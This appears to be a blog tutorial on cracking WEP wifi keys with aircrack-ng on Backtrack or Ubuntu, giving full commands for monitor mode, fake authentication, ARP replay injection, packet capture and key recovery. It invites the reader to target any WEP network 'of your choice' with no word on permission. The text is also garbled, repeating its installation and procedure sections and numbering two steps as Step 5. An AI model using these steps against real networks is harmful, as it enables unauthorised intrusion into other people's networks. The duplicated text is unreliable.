How to Hack Wifi Networks with Backtrack, and other Ubuntu based Distros.
How to Hack Wifi Networks with Backtrack, and other Ubuntu based Distros.
(using aircrack-ng)
------------------------------------------------------------------------------------------------------------------------------
Installation:
(using aircrack-ng)
Installation:
As you all know backtrack is a Pentesting based distro, it comes with aircrack-ng and other tools pre installed.
so you dont need to install anything else.
But if you use Ubuntu or Linux Mint you need to install aircrack-ng,
To do this open up the terminal (Ctrl + Alt + T)
Type "sudo apt-get install aircrack-ng"
------------------------------------------------------------------------------------------------------------------------------------
Procedure:
Step 1:-
First open a new terminal (Ctrl + Alt + T) and type:
sudo airmon-ng
This will give the output something like this. This is your interface, In my case its "Wlan0". Most probably the same as yours.
Interface Chipset Driver
wlan0 Atheros ath9k - [phy0]
Step 2:-
Now that you know your Interface, begin the Interfce Monitor. Type:
sudo airmon-ng start wlan0
(replace wlan0 with your interface)
Step 3:-
Type In:
sudo airodump-ng mon0
This will scan for available wifi networks.
After scanning for networks, pick a WEP enabled network of your choice.
Now type in the terminal :
sudo airodump-ng --channel 8 mon0
(NOTE: Replace the "8" with the Channel of your picked Network)
This will start to collect data from the netwrok you provided.
Keep that Terminal open, dont close it.
Step 4:-
Open a new terminal and type :
sudo aireplay-ng --fakeauth 0 -a 6C:FD:B9:3D:B8:32 -e name mon0
(NOTE Replace the "6C:FD:B9:3D:B8:32 " with the BSSID of the network you picked)
(Replace the "name" with the name of the network you picked)
Step 5:-
Open a new terminal and type :
sudo airodump-ng --channel 8 -w /home/user/wep -i mon0
(Replace the channel as you did before and change the "user" in "/home/user/wep" with the
username of your Ubuntu PC)
It will start capturing the data from the network.
Open a new terminal and type :
sudo aireplay-ng -3 -b 6C:FD:B9:3D:B8:32 mon0
(Replace the "6C:FD:B9:3D:B8:32" with the BSSID of your network as you did before.)
Now wait for a while.. The More you wait the easier to crack.
Step 5:-
Now after capturing enough data from the network, its time to crack it.
Open a terminal and Type :
sudo aircrack-ng -0 -b 6C:FD:B9:3D:B8:32 /home/user/wep-02.ivs
(Replace the "user" like you did before")
If enough amount of data is collected, It will crack and show you the WEP Key.
Otherwise It will wait untill sufficient data i collected.
so you dont need to install anything else.
But if you use Ubuntu or Linux Mint you need to install aircrack-ng,
To do this open up the terminal (Ctrl + Alt + T)
Type "sudo apt-get install aircrack-ng"
------------------------------------------------------------------------------------------------------------------------------------
Procedure:
Step 1:-
First open a new terminal (Ctrl + Alt + T) and type:
sudo airmon-ng
This will give the output something like this. This is your interface, In my case its "Wlan0". Most probably the same as yours.
Interface Chipset Driver
wlan0 Atheros ath9k - [phy0]
Step 2:-
Now that you know your Interface, begin the Interfce Monitor. Type:
sudo airmon-ng start wlan0
(replace wlan0 with your interface)
Step 3:-
Type In:
sudo airodump-ng mon0
This will scan for available wifi networks.
After scanning for networks, pick a WEP enabled network of your choice.
Now type in the terminal :
sudo airodump-ng --channel 8 mon0
(NOTE: Replace the "8" with the Channel of your picked Network)
This will start to collect data from the netwrok you provided.
Keep that Terminal open, dont close it.
Step 4:-
Open a new terminal and type :
sudo aireplay-ng --fakeauth 0 -a 6C:FD:B9:3D:B8:32 -e name mon0
(NOTE Replace the "6C:FD:B9:3D:B8:32 " with the BSSID of the network you picked)
(Replace the "name" with the name of the network you picked)
Step 5:-
Open a new terminal and type :
sudo airodump-ng --channel 8 -w /home/user/wep -i mon0
(Replace the channel as you did before and change the "user" in "/home/user/wep" with the
username of your Ubuntu PC)
It will start capturing the data from the network.
Open a new terminal and type :
sudo aireplay-ng -3 -b 6C:FD:B9:3D:B8:32 mon0
(Replace the "6C:FD:B9:3D:B8:32" with the BSSID of your network as you did before.)
Now wait for a while.. The More you wait the easier to crack.
Step 5:-
Now after capturing enough data from the network, its time to crack it.
Open a terminal and Type :
sudo aircrack-ng -0 -b 6C:FD:B9:3D:B8:32 /home/user/wep-02.ivs
(Replace the "user" like you did before")
If enough amount of data is collected, It will crack and show you the WEP Key.
Otherwise It will wait untill sufficient data i collected.
No comments: